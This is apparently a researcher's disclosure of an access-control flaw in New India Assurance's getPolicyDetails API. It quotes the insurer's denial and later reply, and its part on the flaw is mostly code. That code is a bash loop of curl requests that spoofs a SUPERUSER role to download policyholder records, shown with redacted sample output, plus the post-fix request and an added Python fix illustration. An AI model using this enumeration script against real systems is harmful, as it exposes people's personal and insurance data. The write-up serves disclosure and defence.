
The New India Assurance Co Ltd Alleged Vulnerability 2024

An "alleged" vulnerability in the New India Assurance website allowed the sensitive personal information of any policyholder to be downloaded using nothing more than the policy number.

Summary of the "alleged" vulnerabilities:

| Sr | API | Date reported | Date fixed | Days taken | CERT-In reference number |
|----|-----|---------------|------------|------------|--------------------------|
| 1 | getPolicyDetails | 31 October 2024 | before 18 November 2024 | Less than 18 | Not assigned due to non-reproducibility (the report to CERT-In was delayed relative to the report to NIA) |

Root cause in OWASP terms:

  • A01 2021 Broken Access Control: CWE-35 Path Traversal, CWE-284 Improper Access Control, CWE-285 Improper Authorization
  • A04 2021 Insecure Design: Insecure Direct Object Reference
  • A07 2021 Identification and Authentication Failures: CWE-287 Improper Authentication, CWE-613 Insufficient Session Expiration

It is important to note that the company denied the existence of any vulnerability. Its first response read:

Thank you for your valuable feedback. We would like to inform you that your concerns have been reviewed by the relevant team, and it has been confirmed that the system does not permit downloading of other insured details. We assure you that NIA is committed to maintaining the safety and security of the customers and will continue to do so. We consider the matter resolved and are closing it accordingly.

After I provided them with a sample JSON file, they replied as follows:

Dear Sir,

Thank you very much for your revert and inputs.

We really appreciate your concern on the matter and seriousness associated with it.

The fact of the matter is that we have a managed SOC and as soon as we received your alert, we had shared the same with our partners for their response post which immediately we sought the services of Cert-In empanelled Independent Assurance Auditor. Based on their observations, we updated both Cert-In as well as IRDA on this issue and shared our response to your query. There was no intention of covering up and NIA believes in collaborative efforts to mitigate vulnerabilities. We are very much interested in learning more on this issue/other cyber security related issues from you and our INFOSEC team will coordinate with you to seek your appointment and meet you in person, if it is acceptable to you, to learn more and to infuse improvements.

We once again thank you for the inputs and support.

$$$

Chief Manager,

Corporate Finance & Accounts Dept.,


1. getPolicyDetails

The API relied on the headers api_key and checksum, but both values were embedded in the front-end code itself and were not tied to any user session. The userid header and the customer ID in the request body were likewise neither authenticated nor signed, so the server had no trustworthy notion of who was asking for which policy.

sample_script.sh
#!/bin/bash
for POLICY_NUMBER in $$$$$$$$ $$$$$$$$; do
    curl 'https://www.newindia.co.in/BaNCSIntegrationWebComp/rest/commoncomponent/getPolicyDetails' -X POST \
    -H 'customerName: CUSTOMER' \
    -H 'typeOfCustomer: CUSTOMER' \
    -H 'api_key: $$$$$$$$' \
    -H 'checksum: $$$$$$$$' \
    -H 'applicationid: portal' \
    -H 'userid: CUSTCG0000' \
    --data-raw '{"userProfile":{"userId":"CUSTCG0000","loggedInRole":"SUPERUSER"},"quote":{"policyNumber":"'"$POLICY_NUMBER"'","processType":"NB","productCode":"PU"},"productCode":"PU"}' \
    -o policy_leak_$POLICY_NUMBER.json
done
Sample output
{
    "header": {
        "eventID": "getPolicyHolderDetail",
        "applicationId": "portal",
        "responseCode": 0,
        "coRelationId": "portal_$$$$_commoncomponent_getPolicyDetails_1730364137360_PRELOGIN",
        "baNCSIntegrationSessionVO": {
            "userCode": "",
            "rolecode": "",
            "userName": "",
            "sessionStatus": ""
        },
        "customerName": "CUSTOMER",
        "typeOfCustomer": "CUSTOMER",
        "deviceID": "$$$$"
    },
    "quote": {
        "termUnit": "Years",
        "policyHolderName": "$$$$",
        "policyBranchCode": "$$$$",
        "quoteNumber": "$$$$",
        "policyId": "$$$$",
        "policyNumber": "$$$$",
        "policyExpiryDate": "$$$$",
        "policyInceptionDate": "$$$$",
        "productCode": "$$$$",
        "policyHolderCode": "$$$$",
        "dateOfApplication": "$$$$",
        "policyStartDate": "$$$$",
        "sumInsured": "$$$$",
        "term": "$$$$",
        "productName": "$$$$",
        "currentStatus": "$$$$",
        "spouseCount": "0",
        "risks": [
            {
                "riskDetails": {
                    "relationWithPolicyHolder": "SELF",
                    "occupation": "$$$$",
                    "relationOfTraveller": null,
                    "nameOfTraveller": null,
                    "genderOfTraveller": null,
                    "dependentChildren": null,
                    "natureOfId": null,
                    "otherId": null,
                    "idDocNo": null,
                    "dependentType": null,
                    "correspContact": null,
                    "document": null,
                    "nationality": "Indian",
                    "passportNo": null,
                    "dateOfIssue": null,
                    "passportExpiryDate": null,
                    "visaWorkPermit": null,
                    "proposedDateOfDeparture": null,
                    "noOfDaysStayedOutsideIndia": null,
                    "expectedNoOfMonthsStudyEmployment": null,
                    "nameOfSchoolWorkplace": null,
                    "addressOfSchoolWorkplace": null,
                    "telNoSchoolWorkplace": null,
                    "sponsorName": null,
                    "sponsorAddress": null,
                    "relationOfSponsor": null,
                    "telNoOfSponsor": null,
                    "otherOccupationDetails": null,
                    "extensionPeriodDays": null,
                    "dateOfBirth": "$$$$",
                    "nameOfInsuredPerson": "$$$$",
                    "ageInYrs": null,
                    "sex": null,
                    "isSpouseEarning": null,
                    "monthlyIncome": "$$$$",
                    "specialConditions": null,
                    "serialNo": null,
                    "relationWithNominee": "$$$$",
                    "nomineeName": "$$$$",
                    "isTableACoverRequired": null,
                    "sumInsured": "$$$$",
                    "sumInsuredForTableA": "$$$$",
                    "isTableBCoverRequired": null,
                    "sumInsuredForTableB": "0",
                    "isTableCCoverRequired": null,
                    "sumInsuredForTableC": "0",
                    "isTableDCoverRequired": null,
                    "sumInsuredForTableD": "0",
                    "capitalSumInsured": null,
                    "rateForTableA": "$$$$",
                    "rateForTableB": "$$$$",
                    "rateForTableC": "$$$$",
                    "rateForTableD": "$$$$",
                    "medicalHistoryDetails": null,
                    "physicianDetails": null,
                    "nomineeDetails": null,
                    "healthStatus": null,
                    "claimReporting": null,
                    "policyExtensionDate": null,
                    "policyExtensionPeriod": null,
                    "anyPhysicalDefects": "N",
                    "mentionDefects": null,
                    "anyPreviousClaim": "N",
                    "cbPerc": null,
                    "cbAmount": null,
                    "isWarAndAlliedRisksCoverage": "N",
                    "countryOfOperation": "INDIA",
                    "typeOfPeriod": "NA",
                    "rateForAbnormalOrApprehensiveorWarPeriod": "0",
                    "sumInsuredForWarndAlliedRiskCoverage": "0",
                    "rateForPeaceTimeorNormalPeriod": null,
                    "nameOfTheCountry": null
                },
                "coverages": [
                    {
                        "coverDetails": {
                            "medicalCoverReq": "N"
                        }
                    }
                ]
            }
        ],
        "partyDetailsList": [
            {
                "partyType": "$$$$",
                "partyStakeCode": "$$$$",
                "stakeCode": "$$$$",
                "individualDetails": {
                    "firstName": "$$$$",
                    "lastName": "$$$$",
                    "gender": "$$$$",
                    "dateOfBirth": "$$$$",
                    "buildingNoStreet": "$$$$",
                    "cityName": "$$$$",
                    "pinCode": "$$$$",
                    "mobileNo": "$$$$",
                    "emailId": "$$$$",
                    "startDate": "$$$$",
                    "contactType": "$$$$",
                    "clientType": "$$$$",
                    "state": "$$$$",
                    "city": "$$$$",
                    "aadhaarAuthStatus": "$$$$",
                    "nationality": "$$$$",
                    "nameOfTheCountry": "$$$$",
                    "ekycStatus": "$$$$"
                }
            },
            {
                "partyCode": "GC00000008",
                "partyStakeCode": "GCE",
                "partyName": "GST-CENTRAL GOVT ",
                "address": "NEW DELHI",
                "stakeCode": "GCE",
                "individualDetails": {
                    "relationshipWithRegisteredUser": "",
                    "buildingNoStreet": "NEW DELHI",
                    "pinCode": "110001",
                    "startDate": "$$$$"
                },
                "organizationDetails": {
                    "startDate": "$$$$",
                    "pinCode": "110001",
                    "businessTelNumExtn": "",
                    "panNumber": ""
                }
            },
            {
                "partyCode": "GS00000033",
                "partyStakeCode": "GSS",
                "partyName": "GST-STATE GOV-RAJASTHAN ",
                "address": "RAJASTHAN",
                "stakeCode": "GSS",
                "individualDetails": {
                    "relationshipWithRegisteredUser": "",
                    "buildingNoStreet": "RAJASTHAN",
                    "pinCode": "313001",
                    "startDate": "$$$$"
                },
                "organizationDetails": {
                    "startDate": "$$$$",
                    "pinCode": "313001",
                    "businessTelNumExtn": "",
                    "panNumber": ""
                }
            },
            {
                "partyCode": "DI830000",
                "partyStakeCode": "DIRECT",
                "partyName": "DI_DIGITAL HUB DI_DIGITAL HUB",
                "address": "6TH FLOOR, MOTI MAHAL,",
                "stakeCode": "DIRECT",
                "individualDetails": {
                    "relationshipWithRegisteredUser": "",
                    "buildingNoStreet": "6TH FLOOR, MOTI MAHAL,",
                    "pinCode": "400020",
                    "startDate": "$$$$"
                },
                "organizationDetails": {
                    "startDate": "$$$$",
                    "pinCode": "400020",
                    "businessTelNumExtn": "",
                    "panNumber": ""
                }
            }
        ],
        "premiumDetails": {
            "totalPremium": "$$$$",
            "serviceTax": "$$$$",
            "netPremium": "$$$$"
        },
        "coverage": "Self",
        "numChildrenToCover": "0",
        "renewedQuoteNo": "$$$$",
        "coverCode": "STDCOVER"
    },
    "userProfile": {
        "footer": {
            "errorCode": "0"
        }
    }
}

Alleged fix

After the "alleged" fix, the curl request looked as follows. Observe the new X-Auth-Token header and the additional Cookie header; the api_key and checksum headers are still present.

sample_script_fixed.sh
curl 'https://www.newindia.co.in/BaNCSIntegrationWebComp/rest/commoncomponent/getPolicyDetails' -X POST \
 -H 'X-Auth-Token: $$$$$$$$' \
 -H 'customerName: CUSTOMER' \
 -H 'typeOfCustomer: CUSTOMER' \
 -H 'api_key: $$$$$$$$' \
 -H 'checksum: $$$$' \
 -H 'applicationid: portal' \
 -H 'Cookie: citrix_ns_id=$$$$$$$$' \
 -H 'userid: CUSTCG0000' \
 --data-raw '{"userProfile":{"userId":"CUSTCG0000","loggedInRole":"SUPERUSER"},"quote":{"policyNumber":"$$$$$$$$","processType":"NB","productCode":"PU"},"productCode":"PU"}'
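As an added illustration (not code from this page or from NIA's systems), the handler below contrasts the pre-fix gate described under getPolicyDetails, a static api_key that the browser already holds, with the session-bound, object-level check that a header such as the X-Auth-Token in the alleged fix only helps if the server actually enforces: identity comes from the server-side session, never from userProfile.userId or the userid header, and the requested policy must belong to that identity. The session and policy records, token values, key string and clock value are all constructed placeholders.

```python
import hmac
from typing import Optional

# Constructed sample data (placeholders, not real NIA records): a session
# store keyed by X-Auth-Token value and a policy store keyed by policy number.
CLOCK_NOW = 1_700_000_000.0  # constructed fixed clock for reproducible checks
SESSIONS = {
    "tok-alice": {"user_id": "CUST000001", "expires": CLOCK_NOW + 3600},
    "tok-stale": {"user_id": "CUST000002", "expires": CLOCK_NOW - 1},
}
POLICIES = {
    "POL-1001": {"owner": "CUST000001", "policyHolderName": "A. Example"},
    "POL-2002": {"owner": "CUST000002", "policyHolderName": "B. Example"},
}
FRONTEND_API_KEY = "static-key-shipped-in-frontend-js"  # constructed placeholder


def vulnerable_get_policy_details(headers: dict, body: dict) -> Optional[dict]:
    """Pre-fix shape: the only gate is a static api_key already present in the
    front-end code; userProfile.userId and loggedInRole are client-supplied and
    never checked, so any policy number is served to any caller."""
    if not hmac.compare_digest(headers.get("api_key", ""), FRONTEND_API_KEY):
        return None
    return POLICIES.get(body.get("quote", {}).get("policyNumber"))


def hardened_get_policy_details(headers: dict, body: dict, now: float = CLOCK_NOW) -> dict:
    """Session-bound, object-level authorization: the caller's identity is taken
    from the server-side session behind X-Auth-Token, and the requested policy
    must belong to that identity (closes the IDOR / CWE-285 gap)."""
    session = SESSIONS.get(headers.get("X-Auth-Token", ""))
    if session is None or session["expires"] <= now:
        return {"status": 401, "error": "invalid or expired session"}  # CWE-613
    policy = POLICIES.get(body.get("quote", {}).get("policyNumber"))
    # Identical response for "no such policy" and "not your policy", so the
    # endpoint does not confirm which policy numbers exist.
    if policy is None or policy["owner"] != session["user_id"]:
        return {"status": 404, "error": "policy not found"}
    return {"status": 200, "policyHolderName": policy["policyHolderName"]}
```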